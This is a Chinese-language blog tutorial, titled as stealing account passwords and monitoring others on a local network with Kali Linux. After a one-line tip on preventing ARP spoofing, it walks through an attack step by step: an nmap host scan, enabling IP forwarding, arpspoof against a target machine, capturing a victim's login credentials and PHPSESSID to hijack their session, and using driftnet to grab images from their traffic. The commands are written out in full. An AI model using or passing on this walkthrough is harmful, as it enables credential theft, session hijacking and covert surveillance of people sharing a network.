kali linux局域网盗窃帐号密码以及监控别人

在一个局域网内在没有进行加密盗取监控你和帐号密码是一个非常简单实现的，预防ARP欺骗
预防

1. 预防ARP欺骗
   他默认是动态的通常的不在意网关ip的
   设置成静态的就可以简单预防ARP欺骗了

实验用的系统和工具

1. 工具Nmap，Arpspoof，Driftnet和 Wireshark

2. 命令
   命令1：在linux系统里ifconfig显示或配置网络设备
   命令2：在winodws里ifconfig显示或配置网络设备

3. 攻击端kali linux系统
   
   
   Linux版的 kali linux是一个专门进行渗透安全做的
   是黑客必不可少的工具之一
   kali有几千个工具比如著名的列：
   扫描大王：Nmap
   Nmap在《黑客帝国》和《谍影重重：极限伯恩》等等电影里也出现过
   学习书《Nmap 参考指南 》
   sql注入利器：sqlmap
   学习书《sqlmap入门到精通》
   神兵利器：msf
   学习书《Metasploit渗透测试指南》
   抓包工具：wire shark
   学习书《Wireshark网络分析的艺术》《网络协议分析》
   瑞士军刀：burp suite
   学习书《BurpSuite 实战指南》
   。。。。。。。。。
   还有很多就不多说了

4. 客户端winxp系统
   微软开发windowsxp，windows2000，windows7，windows10.windows2003大家都在用windows就不多介绍了
   

5. 配置查看
   kali查看ip和网关

   ifconfig
   

   
   winxp查看ip和网关

   ipconfi
   

   

开始演示局域网密码盗窃

1. 用kali里的nmap工具进行局域网扫描

   nmap -sP 192.168.43.0/24
   

   可以看见他存活这ip是192.168.43.218
   
   英文不好的我果断翻译一下
   MAC地址是小米的
   我用的是小米手机开的热点电脑连接的
   

2. 先进行进行IP流量转发不然被黑的xp系统网络就不能用了

   echo 1 > /proc/sys/net/ipv4/ip_forward 
   

   

3. arp欺骗
   kali现在没有默认安装arpspoof需要自己下载

   apt-get install dsniff ssldump
   

   下载
   

4. 转发数据包

   arpspoof -i wlan0 -t 192.168.43.218 192.168.43.255
   

   

5. 客户端登陆帐号密码
   

6. 攻击端的我就可以查看你所有客户端操作的过程
   帐号密码已经被抓取
   

7. 拿到PHPSESSID
   

8. 登陆
   登陆成功
   

9. 抓取客户端照片
   kali现在需要下载 Driftnet

   apt-get install driftnet
   

   下载完成
   
   开始抓取网卡流过的照片

   driftnet -i   wlan0
   

   

   客户端比如在访问照片
   
   攻击端的我用Driftnet进行抓取照片

   driftnet -i   wlan0
   

   可以自己照片已经被抓取到了
   

10. 抓取qq聊天记录
    哈哈哈哈哈哈哈哈哈哈就不要想了被加密了
    

作者QQ2737977997